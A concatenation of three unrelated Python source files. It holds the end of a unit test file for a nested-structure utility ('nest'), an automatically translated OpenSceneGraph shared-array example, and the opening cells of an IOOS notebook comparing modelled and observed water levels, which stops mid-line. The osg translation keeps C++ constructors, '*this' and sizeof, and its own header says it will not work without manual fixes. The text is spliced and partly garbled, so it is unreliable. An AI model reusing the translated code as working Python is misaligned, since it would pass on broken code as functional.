shallow_tree, input_tree)
paths = [p for p, _ in path_value_pairs]
values = [v for _, v in path_value_pairs]
return paths, values
# Shallow tree ends at scalar.
input_tree = [[[2, 2], [3, 3]], [[4, 9], [5, 5]]]
shallow_tree = [[True, True], [False, True]]
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths,
[(0, 0), (0, 1), (1, 0), (1, 1)])
self.assertEqual(flattened_input_tree, [[2, 2], [3, 3], [4, 9], [5, 5]])
self.assertEqual(flattened_shallow_tree_paths,
[(0, 0), (0, 1), (1, 0), (1, 1)])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
# Shallow tree ends at string.
input_tree = [[("a", 1), [("b", 2), [("c", 3), [("d", 4)]]]]]
shallow_tree = [["level_1", ["level_2", ["level_3", ["level_4"]]]]]
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
input_tree_flattened_paths = [p for p, _ in
nest.flatten_with_tuple_paths(input_tree)]
input_tree_flattened = nest.flatten(input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[(0, 0), (0, 1, 0), (0, 1, 1, 0), (0, 1, 1, 1, 0)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[("a", 1), ("b", 2), ("c", 3), ("d", 4)])
self.assertEqual(input_tree_flattened_paths,
[(0, 0, 0), (0, 0, 1),
(0, 1, 0, 0), (0, 1, 0, 1),
(0, 1, 1, 0, 0), (0, 1, 1, 0, 1),
(0, 1, 1, 1, 0, 0), (0, 1, 1, 1, 0, 1)])
self.assertEqual(input_tree_flattened, ["a", 1, "b", 2, "c", 3, "d", 4])
# Make sure dicts are correctly flattened, yielding values, not keys.
input_tree = {"a": 1, "b": {"c": 2}, "d": [3, (4, 5)]}
shallow_tree = {"a": 0, "b": 0, "d": [0, 0]}
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",), ("b",), ("d", 0), ("d", 1)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[1, {"c": 2}, 3, (4, 5)])
# Namedtuples.
ab_tuple = collections.namedtuple("ab_tuple", "a, b")
input_tree = ab_tuple(a=[0, 1], b=2)
shallow_tree = ab_tuple(a=0, b=1)
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",), ("b",)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[[0, 1], 2])
# Nested dicts, OrderedDicts and namedtuples.
input_tree = collections.OrderedDict(
[("a", ab_tuple(a=[0, {"b": 1}], b=2)),
("c", {"d": 3, "e": collections.OrderedDict([("f", 4)])})])
shallow_tree = input_tree
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a", "a", 0),
("a", "a", 1, "b"),
("a", "b"),
("c", "d"),
("c", "e", "f")])
self.assertEqual(input_tree_flattened_as_shallow_tree, [0, 1, 2, 3, 4])
shallow_tree = collections.OrderedDict([("a", 0), ("c", {"d": 3, "e": 1})])
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",),
("c", "d"),
("c", "e")])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
3,
collections.OrderedDict([("f", 4)])])
shallow_tree = collections.OrderedDict([("a", 0), ("c", 0)])
(input_tree_flattened_as_shallow_tree_paths,
input_tree_flattened_as_shallow_tree) = get_paths_and_values(shallow_tree,
input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree_paths,
[("a",), ("c",)])
self.assertEqual(input_tree_flattened_as_shallow_tree,
[ab_tuple(a=[0, {"b": 1}], b=2),
{"d": 3, "e": collections.OrderedDict([("f", 4)])}])
## Shallow non-list edge-case.
# Using iterable elements.
input_tree = ["input_tree"]
shallow_tree = "shallow_tree"
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = ["input_tree_0", "input_tree_1"]
shallow_tree = "shallow_tree"
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Test case where len(shallow_tree) < len(input_tree)
input_tree = {"a": "A", "b": "B", "c": "C"}
shallow_tree = {"a": 1, "c": 2}
with self.assertRaisesWithLiteralMatch( # pylint: disable=g-error-prone-assert-raises
ValueError,
nest._STRUCTURES_HAVE_MISMATCHING_LENGTHS.format(
input_length=len(input_tree),
shallow_length=len(shallow_tree))):
get_paths_and_values(shallow_tree, input_tree)
# Using non-iterable elements.
input_tree = [0]
shallow_tree = 9
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = [0, 1]
shallow_tree = 9
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Both non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = "shallow_tree"
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = 0
shallow_tree = 0
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree_paths, [()])
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree_paths, [()])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Input non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = ["shallow_tree"]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = "input_tree"
shallow_tree = ["shallow_tree_9", "shallow_tree_8"]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,), (1,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
# Using non-iterable elements.
input_tree = 0
shallow_tree = [9]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
input_tree = 0
shallow_tree = [9, 8]
with self.assertRaisesWithLiteralMatch(
TypeError,
nest._IF_SHALLOW_IS_SEQ_INPUT_MUST_BE_SEQ.format(type(input_tree))):
(flattened_input_tree_paths,
flattened_input_tree) = get_paths_and_values(shallow_tree, input_tree)
(flattened_shallow_tree_paths,
flattened_shallow_tree) = get_paths_and_values(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree_paths, [(0,), (1,)])
self.assertEqual(flattened_shallow_tree, shallow_tree)
def testMapStructureUpTo(self):
# Named tuples.
ab_tuple = collections.namedtuple("ab_tuple", "a, b")
op_tuple = collections.namedtuple("op_tuple", "add, mul")
inp_val = ab_tuple(a=2, b=3)
inp_ops = ab_tuple(a=op_tuple(add=1, mul=2), b=op_tuple(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val, lambda val, ops: (val + ops.add) * ops.mul, inp_val, inp_ops)
self.assertEqual(out.a, 6)
self.assertEqual(out.b, 15)
# Lists.
data_list = [[2, 4, 6, 8], [[1, 3, 5, 7, 9], [3, 5, 7]]]
name_list = ["evens", ["odds", "primes"]]
out = nest.map_structure_up_to(
name_list, lambda name, sec: "first_{}_{}".format(len(sec), name),
name_list, data_list)
self.assertEqual(out, ["first_4_evens", ["first_5_odds", "first_3_primes"]])
# Dicts.
inp_val = dict(a=2, b=3)
inp_ops = dict(a=dict(add=1, mul=2), b=dict(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
self.assertEqual(out["a"], 6)
self.assertEqual(out["b"], 15)
# Non-equal dicts.
inp_val = dict(a=2, b=3)
inp_ops = dict(a=dict(add=1, mul=2), c=dict(add=2, mul=3))
with self.assertRaisesWithLiteralMatch(
ValueError,
nest._SHALLOW_TREE_HAS_INVALID_KEYS.format(["b"])):
nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
# Dict+custom mapping.
inp_val = dict(a=2, b=3)
inp_ops = _CustomMapping(a=dict(add=1, mul=2), b=dict(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
self.assertEqual(out["a"], 6)
self.assertEqual(out["b"], 15)
# Non-equal dict/mapping.
inp_val = dict(a=2, b=3)
inp_ops = _CustomMapping(a=dict(add=1, mul=2), c=dict(add=2, mul=3))
with self.assertRaisesWithLiteralMatch(
ValueError,
nest._SHALLOW_TREE_HAS_INVALID_KEYS.format(["b"])):
nest.map_structure_up_to(
inp_val,
lambda val, ops: (val + ops["add"]) * ops["mul"], inp_val, inp_ops)
def testGetTraverseShallowStructure(self):
scalar_traverse_input = [3, 4, (1, 2, [0]), [5, 6], {"a": (7,)}, []]
scalar_traverse_r = nest.get_traverse_shallow_structure(
lambda s: not isinstance(s, tuple),
scalar_traverse_input)
self.assertEqual(scalar_traverse_r,
[True, True, False, [True, True], {"a": False}, []])
nest.assert_shallow_structure(scalar_traverse_r,
scalar_traverse_input)
structure_traverse_input = [(1, [2]), ([1], 2)]
structure_traverse_r = nest.get_traverse_shallow_structure(
lambda s: (True, False) if isinstance(s, tuple) else True,
structure_traverse_input)
self.assertEqual(structure_traverse_r,
[(True, False), ([True], False)])
nest.assert_shallow_structure(structure_traverse_r,
structure_traverse_input)
with self.assertRaisesRegexp(TypeError, "returned structure"):
nest.get_traverse_shallow_structure(lambda _: [True], 0)
with self.assertRaisesRegexp(TypeError, "returned a non-bool scalar"):
nest.get_traverse_shallow_structure(lambda _: 1, [1])
with self.assertRaisesRegexp(
TypeError, "didn't return a depth=1 structure of bools"):
nest.get_traverse_shallow_structure(lambda _: [1], [1])
def testYieldFlatStringPaths(self):
for inputs_expected in ({"inputs": [], "expected": []},
{"inputs": 3, "expected": [()]},
{"inputs": [3], "expected": [(0,)]},
{"inputs": {"a": 3}, "expected": [("a",)]},
{"inputs": {"a": {"b": 4}},
"expected": [("a", "b")]},
{"inputs": [{"a": 2}], "expected": [(0, "a")]},
{"inputs": [{"a": [2]}], "expected": [(0, "a", 0)]},
{"inputs": [{"a": [(23, 42)]}],
"expected": [(0, "a", 0, 0), (0, "a", 0, 1)]},
{"inputs": [{"a": ([23], 42)}],
"expected": [(0, "a", 0, 0), (0, "a", 1)]},
{"inputs": {"a": {"a": 2}, "c": [[[4]]]},
"expected": [("a", "a"), ("c", 0, 0, 0)]},
{"inputs": {"0": [{"1": 23}]},
"expected": [("0", 0, "1")]}):
inputs = inputs_expected["inputs"]
expected = inputs_expected["expected"]
self.assertEqual(list(nest.yield_flat_paths(inputs)), expected)
# We cannot define namedtuples within @parameterized argument lists.
# pylint: disable=invalid-name
Foo = collections.namedtuple("Foo", ["a", "b"])
Bar = collections.namedtuple("Bar", ["c", "d"])
# pylint: enable=invalid-name
@parameterized.parameters([
dict(inputs=[], expected=[]),
dict(inputs=[23, "42"], expected=[("0", 23), ("1", "42")]),
dict(inputs=[[[[108]]]], expected=[("0/0/0/0", 108)]),
dict(inputs=Foo(a=3, b=Bar(c=23, d=42)),
expected=[("a", 3), ("b/c", 23), ("b/d", 42)]),
dict(inputs=Foo(a=Bar(c=23, d=42), b=Bar(c=0, d="thing")),
expected=[("a/c", 23), ("a/d", 42), ("b/c", 0), ("b/d", "thing")]),
dict(inputs=Bar(c=42, d=43),
expected=[("c", 42), ("d", 43)]),
dict(inputs=Bar(c=[42], d=43),
expected=[("c/0", 42), ("d", 43)]),
])
def testFlattenWithStringPaths(self, inputs, expected):
self.assertEqual(
nest.flatten_with_joined_string_paths(inputs, separator="/"),
expected)
@parameterized.parameters([
dict(inputs=[], expected=[]),
dict(inputs=[23, "42"], expected=[((0,), 23), ((1,), "42")]),
dict(inputs=[[[[108]]]], expected=[((0, 0, 0, 0), 108)]),
dict(inputs=Foo(a=3, b=Bar(c=23, d=42)),
expected=[(("a",), 3), (("b", "c"), 23), (("b", "d"), 42)]),
dict(inputs=Foo(a=Bar(c=23, d=42), b=Bar(c=0, d="thing")),
expected=[(("a", "c"), 23), (("a", "d"), 42), (("b", "c"), 0),
(("b", "d"), "thing")]),
dict(inputs=Bar(c=42, d=43),
expected=[(("c",), 42), (("d",), 43)]),
dict(inputs=Bar(c=[42], d=43),
expected=[(("c", 0), 42), (("d",), 43)]),
])
def testFlattenWithTuplePaths(self, inputs, expected):
self.assertEqual(nest.flatten_with_tuple_paths(inputs), expected)
@parameterized.named_parameters(
("tuples", (1, 2), (3, 4), True, (("0", 4), ("1", 6))),
("dicts", {"a": 1, "b": 2}, {"b": 4, "a": 3}, True,
{"a": ("a", 4), "b": ("b", 6)}),
("mixed", (1, 2), [3, 4], False, (("0", 4), ("1", 6))),
("nested",
{"a": [2, 3], "b": [1, 2, 3]}, {"b": [5, 6, 7], "a": [8, 9]}, True,
{"a": [("a/0", 10), ("a/1", 12)],
"b": [("b/0", 6), ("b/1", 8), ("b/2", 10)]}))
def testMapWithPathsCompatibleStructures(self, s1, s2, check_types, expected):
def format_sum(path, *values):
return (path, sum(values))
result = nest.map_structure_with_paths(format_sum, s1, s2,
check_types=check_types)
self.assertEqual(expected, result)
@parameterized.named_parameters(
("tuples", (1, 2, 3), (4, 5), ValueError),
("dicts", {"a": 1}, {"b": 2}, ValueError),
("mixed", (1, 2), [3, 4], TypeError),
("nested",
{"a": [2, 3, 4], "b": [1, 3]},
{"b": [5, 6], "a": [8, 9]},
ValueError
))
def testMapWithPathsIncompatibleStructures(self, s1, s2, error_type):
with self.assertRaises(error_type):
nest.map_structure_with_paths(lambda path, *s: 0, s1, s2)
@parameterized.named_parameters([
dict(testcase_name="Tuples", s1=(1, 2), s2=(3, 4),
check_types=True, expected=(((0,), 4), ((1,), 6))),
dict(testcase_name="Dicts", s1={"a": 1, "b": 2}, s2={"b": 4, "a": 3},
check_types=True, expected={"a": (("a",), 4), "b": (("b",), 6)}),
dict(testcase_name="Mixed", s1=(1, 2), s2=[3, 4],
check_types=False, expected=(((0,), 4), ((1,), 6))),
dict(testcase_name="Nested",
s1={"a": [2, 3], "b": [1, 2, 3]},
s2={"b": [5, 6, 7], "a": [8, 9]},
check_types=True,
expected={"a": [(("a", 0), 10), (("a", 1), 12)],
"b": [(("b", 0), 6), (("b", 1), 8), (("b", 2), 10)]}),
])
def testMapWithTuplePathsCompatibleStructures(
self, s1, s2, check_types, expected):
def path_and_sum(path, *values):
return path, sum(values)
result = nest.map_structure_with_tuple_paths(
path_and_sum, s1, s2, check_types=check_types)
self.assertEqual(expected, result)
@parameterized.named_parameters([
dict(testcase_name="Tuples", s1=(1, 2, 3), s2=(4, 5),
error_type=ValueError),
dict(testcase_name="Dicts", s1={"a": 1}, s2={"b": 2},
error_type=ValueError),
dict(testcase_name="Mixed", s1=(1, 2), s2=[3, 4], error_type=TypeError),
dict(testcase_name="Nested",
s1={"a": [2, 3, 4], "b": [1, 3]},
s2={"b": [5, 6], "a": [8, 9]},
error_type=ValueError)
])
def testMapWithTuplePathsIncompatibleStructures(self, s1, s2, error_type):
with self.assertRaises(error_type):
nest.map_structure_with_tuple_paths(lambda path, *s: 0, s1, s2)
def testFlattenCustomSequenceThatRaisesException(self): # b/140746865
seq = _CustomSequenceThatRaisesException()
with self.assertRaisesRegexp(ValueError, "Cannot get item"):
nest.flatten(seq)
def testListToTuple(self):
input_sequence = [1, (2, {3: [4, 5, (6,)]}, None, 7, [[[8]]])]
expected = (1, (2, {3: (4, 5, (6,))}, None, 7, (((8,),),)))
nest.assert_same_structure(
nest.list_to_tuple(input_sequence),
expected,
)
class NestBenchmark(test.Benchmark):
def run_and_report(self, s1, s2, name):
burn_iter, test_iter = 100, 30000
for _ in xrange(burn_iter):
nest.assert_same_structure(s1, s2)
t0 = time.time()
for _ in xrange(test_iter):
nest.assert_same_structure(s1, s2)
t1 = time.time()
self.report_benchmark(iters=test_iter, wall_time=(t1 - t0) / test_iter,
name=name)
def benchmark_assert_structure(self):
s1 = (((1, 2), 3), 4, (5, 6))
s2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6"))
self.run_and_report(s1, s2, "assert_same_structure_6_elem")
s1 = (((1, 2), 3), 4, (5, 6)) * 10
s2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6")) * 10
self.run_and_report(s1, s2, "assert_same_structure_60_elem")
if __name__ == "__main__":
test.main()
|
|
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgsharedarray"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osg
from osgpypp import osgViewer
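# GL_FLOAT, used in the osg.Array constructor calls below, comes from the
# OpenGL headers in the C++ original and is not defined by these imports.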
# Translated from file 'osgsharedarray.cpp'
# OpenSceneGraph example, osgsharedarray.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osg/Array>
#include <osg/Geode>
#include <osg/Geometry>
#include <osgViewer/Viewer>
#* This class is an example of how to create your own subclass of osg.Array. This
# * is useful if your application has data in its own form of storage and you don't
# * want to make another copy into one of the predefined osg.Array classes.
# *
# * @note This is not really intended to be a useful subclass of osg.Array. It
# * doesn't do anything smart about memory management. It is simply intended as
# * an example you can follow to create your own subclasses of osg.Array for
# * your application's storage requirements.
#
class MyArray (osg.Array) :
#* Default ctor. Creates an empty array.
MyArray() :
osg.Array(osg.Array.Vec3ArrayType,3,GL_FLOAT),
_numElements(0),
_ptr(NULL)
#* "Normal" ctor.
# *
# * @param no The number of elements in the array.
# * @param ptr Pointer to the data. This class just keeps that
# * pointer. It doesn't manage the memory.
#
MyArray(unsigned int no, osg.Vec3* ptr) :
osg.Array(osg.Array.Vec3ArrayType,3,GL_FLOAT),
_numElements(no),
_ptr(ptr)
#* Copy ctor.
MyArray( MyArray other, osg.CopyOp copyop) :
osg.Array(osg.Array.Vec3ArrayType,3,GL_FLOAT),
_numElements(other._numElements),
_ptr(other._ptr)
#* What type of object would clone return?
def cloneType():
return MyArray()
#* Create a copy of the object.
def clone(copyop):
return MyArray(*this,copyop)
#* Accept method for ArrayVisitors.
# *
# * @note This will end up in ArrayVisitor.apply(osg.Array).
#
def accept(av):
av.apply(*this)
#* Const accept method for ArrayVisitors.
# *
# * @note This will end up in ConstArrayVisitor.apply( osg.Array).
#
def accept(cav):
cav.apply(*this)
#* Accept method for ValueVisitors.
def accept(index, vv):
vv.apply(_ptr[index])
#* Const accept method for ValueVisitors.
def accept(index, cvv):
cvv.apply(_ptr[index])
#* Compare method.
# * Return -1 if lhs element is less than rhs element, 0 if equal,
# * 1 if lhs element is greater than rhs element.
#
def compare(lhs, rhs):
elem_lhs = _ptr[lhs]
elem_rhs = _ptr[rhs]
if elem_lhs<elem_rhs : return -1
if elem_rhs<elem_lhs : return 1
return 0
def getElementSize():
        return sizeof(osg.Vec3)
#* Returns a pointer to the first element of the array.
def getDataPointer():
return _ptr
#* Returns the number of elements in the array.
def getNumElements():
return _numElements
#* Returns the number of bytes of storage required to hold
# * all of the elements of the array.
#
def getTotalDataSize():
return _numElements * sizeof(osg.Vec3)
def reserveArray(num):
OSG_NOTICE, "reserveArray() not supported"
def resizeArray(num):
OSG_NOTICE, "resizeArray() not supported"
    _numElements = 0     # unsigned int in the C++ original
    _ptr = None          # osg.Vec3* in the C++ original
#* The data values for the example. Simply defines a cube with
# * per-face colors and normals.
#
myVertices = [osg.Vec3(-1.,-1., 1.),
osg.Vec3( 1.,-1., 1.),
osg.Vec3( 1., 1., 1.),
osg.Vec3(-1., 1., 1.),
osg.Vec3( 1.,-1., 1.),
osg.Vec3( 1.,-1.,-1.),
osg.Vec3( 1., 1.,-1.),
osg.Vec3( 1., 1., 1.),
osg.Vec3( 1.,-1.,-1.),
osg.Vec3(-1.,-1.,-1.),
osg.Vec3(-1., 1.,-1.),
osg.Vec3( 1., 1.,-1.),
osg.Vec3(-1.,-1.,-1.),
osg.Vec3(-1.,-1., 1.),
osg.Vec3(-1., 1., 1.),
osg.Vec3(-1., 1.,-1.),
osg.Vec3(-1., 1., 1.),
osg.Vec3( 1., 1., 1.),
osg.Vec3( 1., 1.,-1.),
osg.Vec3(-1., 1.,-1.),
osg.Vec3(-1.,-1.,-1.),
osg.Vec3( 1.,-1.,-1.),
osg.Vec3( 1.,-1., 1.),
              osg.Vec3(-1.,-1., 1.)]
myNormals = [osg.Vec3( 0., 0., 1.),
osg.Vec3( 0., 0., 1.),
osg.Vec3( 0., 0., 1.),
osg.Vec3( 0., 0., 1.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3(-1., 0., 0.),
osg.Vec3(-1., 0., 0.),
osg.Vec3(-1., 0., 0.),
osg.Vec3(-1., 0., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0.,-1., 0.),
osg.Vec3( 0.,-1., 0.),
osg.Vec3( 0.,-1., 0.),
             osg.Vec3( 0.,-1., 0.)]
myColors = [osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 0., 1., 1., 1.),
osg.Vec4( 0., 1., 1., 1.),
osg.Vec4( 0., 1., 1., 1.),
            osg.Vec4( 0., 1., 1., 1.)]
#* Create a Geode that describes a cube using our own
# * subclass of osg.Array for the vertices. It uses
# * the "regular" array classes for all of the other
# * arrays.
# *
# * Creating your own Array class isn't really very
# * useful for a tiny amount of data like this. You
# * could just go ahead and copy the data into one of
# * the "regular" Array classes like this does for
# * normals and colors. The point of creating your
# * own subclass of Array is for use with datasets
# * that are much larger than anything you could
# * create a simple example from. In that case, you
# * might not want to create a copy of the data in
# * one of the Array classes that comes with OSG, but
# * instead reuse the copy your application already
# * has and wrap it up in a subclass of osg.Array
# * that presents the right interface for use with
# * OpenSceneGraph.
# *
# * Note that I'm only using the shared array for the
# * vertices. You could do something similar for any
# * of the Geometry node's data arrays.
#
def createGeometry():
geode = osg.Geode()
# create Geometry
geom = osg.Geometry(osg.Geometry())
    # add vertices using MyArray class (a Python sequence stands in for the C++ pointer)
    numVertices = len(myVertices)
    geom.setVertexArray(MyArray(numVertices, myVertices))
    # add normals (assumes the binding accepts the sequence directly)
    numNormals = len(myNormals)
    geom.setNormalArray(osg.Vec3Array(numNormals, myNormals), osg.Array.BIND_PER_VERTEX)
    # add colors (assumes the binding accepts the sequence directly)
    numColors = len(myColors)
    color_array = osg.Vec4Array(numColors, myColors)
    geom.setColorArray(color_array, osg.Array.BIND_PER_VERTEX)
# add PrimitiveSet
geom.addPrimitiveSet(osg.DrawArrays(osg.PrimitiveSet.QUADS, 0, numVertices))
# Changing these flags will tickle different cases in
# Geometry.drawImplementation. They should all work fine
# with the shared array.
geom.setUseVertexBufferObjects(False)
geom.setUseDisplayList(False)
geode.addDrawable( geom )
return geode
def main(argv):
# construct the viewer.
viewer = osgViewer.Viewer()
# add model to viewer.
viewer.setSceneData( createGeometry() )
# create the windows and run the threads.
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
|
|
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <markdowncell>
# # IOOS System Test: [Extreme Events Theme]
# (https://github.com/ioos/system-test/wiki/Development-of-Test-Themes#
# wiki-theme-2-extreme-events): Inundation
#
# ### Compare modeled water levels with observations for a specified bounding box
# and time period using IOOS recommended service standards for catalog search
# (CSW) and data retrieval (OPeNDAP & SOS).
#
# * Query CSW to find datasets that match criteria
# * Extract OPeNDAP data endpoints from model datasets and SOS endpoints from
# observational datasets
# * OPeNDAP model datasets will be granules
# * SOS endpoints may be datasets (from ncSOS) or collections of datasets (from
# NDBC, CO-OPS SOS servers)
# * Filter SOS services to obtain datasets
# * Extract data from SOS datasets
# * Extract data from model datasets at locations of observations
# * Compare time series data on same vertical datum
# <codecell>
# Standard Library.
from warnings import warn
from datetime import datetime, timedelta
# Scientific stack.
import iris
iris.FUTURE.netcdf_promote = True
import numpy as np
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
from matplotlib.transforms import offset_copy
from cartopy.io.img_tiles import MapQuestOpenAerial
from pandas import DataFrame, date_range, read_csv, concat
from iris.exceptions import CoordinateNotFoundError, ConstraintMismatchError
# Custom IOOS/ASA modules (available at PyPI).
from owslib import fes
from owslib.csw import CatalogueServiceWeb
from pyoos.collectors.coops.coops_sos import CoopsSos
# Local imports
from utilities import name_list, sos_name
from utilities import (fes_date_filter, coops2df, find_timevar, find_ij, nearxy,
service_urls, mod_df)
# <markdowncell>
# ### Specify a time range and bounding box of interest:
# <codecell>
dates = {'Hurricane sandy':
